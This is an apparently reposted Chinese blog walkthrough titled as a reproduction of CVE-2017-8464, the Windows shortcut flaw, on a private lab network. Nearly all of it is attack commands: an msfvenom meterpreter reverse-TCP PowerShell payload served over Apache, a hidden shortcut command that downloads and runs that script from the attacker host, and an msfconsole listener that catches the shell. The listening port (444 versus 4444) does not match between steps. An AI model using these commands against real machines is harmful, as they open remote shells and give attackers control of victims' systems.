CVE-2017-8464復現 (遠程快捷方式漏洞)


我們的攻擊機IP是192.168.222.133  

目標機IP是192.168.222.132

我們首先生成一個powershell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f psh-reflection>1.ps1

把生成的1.ps1 copy到/var/www/html cp /root/1.ps1 /var/www/html

service apache2 start 然后我們訪問127.0.0.1/1.ps1 是可以訪問的

我們在目標機創建快捷方式powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.222.133/1.ps1');test.ps1"

然后訪問

創建監聽,然后連接meterpreter

msfconsole

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.222.133

set LPORT 4444

exploit

復現成功

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM